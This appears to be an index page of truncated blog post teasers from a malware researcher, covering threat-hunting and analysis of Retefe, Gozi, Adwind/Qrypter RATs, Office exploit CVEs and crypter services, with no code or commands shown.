Malicious email campaign mimicking Swiss Financial Institutions: Retefe again.
Yesterday, while I was investigating something else I ended up with some malicious email impersonating a Swiss bank. Â The email with the subject "Von Ihrem Konto ist 78 Franken abgebucht" contains a...
View ArticleMalicious email campaign mimicking Swiss Financial Institutions: Retefe again...
A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JS embedded in the .docx file.  So...
View ArticleMalicious email campaign mimicking Swiss Financial Institutions: Retefe again...
Following last two posts, this is a quick update as I have detected that some new Swiss banks have been added to the list of victims of Retefe (since last time I checked some weeks ago)These are:...
View ArticleHunting malicious behaviour abusing PowerShell with Sysmon and Splunk
Sysmon is a monitoring tool which combined with Splunk makes an excellent tandem for threat hunting. A good example was presented by Tom Ueltschi at Botconf 2016.Windows PowerShell is a command shell...
View ArticleDetecting Mimikatz launched by PowerShell
Following my last post about how to hunt for malicious PowerShell commands, I'm interested to detect Mimikatz once it is launched through PowerShell, like for example with PowerShellEmpire framework....
View ArticleHunting Retefe with Splunk - some interesting points
While I was creating some Splunk use cases to detect malware (together with Sysmon) I was doing some test with malware Refete which I wrote quite a bit in this blog about it. There are a couple of...
View ArticleRetefe hitting MacOSX - Some interesting points
A few weeks ago Checkpoint posted about a malware in MacOSX OSX/Dok which it is the version of Retefe ported to Mac OS.Most of the technical aspects of this specimen behaviour are described in the blog...
View ArticleMalspam campaign exploiting CVE-2017-0199: a hunting approach
In the last days I have seen a few malspam emails with RTF files attached.The content of the mails is fake Shipping order with a ZIP attachment, containing the malicious RTF file. Â An example of this...
View ArticleAnalysis of a malicious DOC used by Turla APT group; hunting persistence via...
Yesterday, Â John Lambert (@JohnLaTwC), from Microsoft Threat Intelligence Center twitted about some malicious document used by Turla ATP group. Â The malicious document was in VT since a few hours...
View ArticleHunting FIN7 malicious documents
A few days ago I read an interesting post about some new technique that FIN7 Threat Actors are using to deliver malicious payloads in RTF and DOC files. The ratio of detection was in the best case only...
View ArticleHunting APT28 CVE-2017-11292 Flash Vulnerability
Proofpoint made public a couple of days ago that APT28 is using the last flash 0-day CVE-2017-11292 via some malicious weaponized DOC files; APT28 racing to exploit CVE-2017-11292 Flash vulnerability...
View ArticleDetecting Adwin malware weaponized in MS office documents
In a daily basis I see lot of Adwin malware trying to infect end usersAdwin is a multiplatform Remote Access Trojan (RAT) which has been in the wild for some time. In this Kasperky Blog post there is a...
View ArticleHunting for Microsoft Equation Vulnerability - CVE-2017-11882
Since Microsoft released November patches last week where CVE-2017-11882 was addressed, I've been trying to get a sample in order to perform some checks for the vulnerability. Today thanks to Corsin...
View ArticleQrypter Java RAT using Tor
Since the 16th of December, almost in a daily basis, I'm seeing a particular family of Java Remote Access using Tor. The samples I took a look are rarely detected by...
View ArticleAnalysis of Adwind embedded in a MS-DOS file
A few days ago there was a malspam campaign mimicking one bank and delivering a PDF file and some DOC files exploiting CVE-2017-11882The PDF file contains several images and and two interesting URLsThe...
View ArticleInside Qarallax / Adwind / Qrypter leading to Tesla / HawkEye (part 1)
A few months ago I wrote about some Java RAT named QRypter (aka QRat or Qarallax) which is basically Adwind with some layers of obfuscation. The post is here.Usually, this RAT is used as first stage of...
View Articleqthelegend: the new Qrypter for Adwind
Since last December, when I blogged the first time about Qrypter, I've been tracking Adwind malware using this service. @abuse.ch wrote a very interesting post about the providers hosting the C2...
View ArticleGozi malspam campaign mimicking Swisscom on 30th July 2018
A few days ago GovCERT.ch informed via twitter about a malspam campaign mimicking Swisscom invoices.The malware delivered in the latest stage was Gozi / Ursnif. But let's analyse a bit this...
View ArticleHunting malware in memory. A Gozi case.
Some of the actors using Gozi / Ursnif take advantage of compromised emails (BEC) to deliver weaponised Microsoft Office documents. This is not new at all, however in the last week I've seen an...
View ArticleKnowing your adversaries and their TTPs. The Gozi case
Gozi (aka Ursnif), as many other financial malware, is used by several different actors operating world-wide. In a daily basis I see Gozi campaigns trying to infect users, however each campaign has...
View ArticleFudcrypt: the service to crypt Java RAT through VBS scripts and Houdini malware
The existence of services to encrypt and obfuscate malware in order to avoid antivirus detection is nothing new at all. In this blog I wrote about a couple of services, qthelegend and qrypter, that...
View ArticleUnknowncrypter, the crypter twin of Fudcrypt: another Crypter-as-a-Service...
Last week I wrote about a Crypter-as-a-Service named Fudcrypt which obfuscates Java RATs in VBS scripts. However, this is not the only service being used by threat actors to deliver encrypted Java...
View ArticleWSH RAT and the link to unknowcrypter and Fudcrypt
There are plenty of malspam campaigns using the the code "MT103" from SWIFT to claim some kind of payments.                    However, recently there was one in particular using some...
View ArticleWSH RAT - Analysis of the code
Analysis of the code - capabilities of WSH RATIn previous post I wrote about the link between WSH RAT and some other crypter services so in this post I'm going to dig a bit in the analysis on the...
View ArticleFudcrypt using H-Worm from WSH RAT
Fudcrypt builder, like WSH RAT builder uses HWorm. The last version of the builder from 24th of September provides some interesting insight:Â In the case of Fudcrypt, compared with WSHRAT, the HWorm...
View Article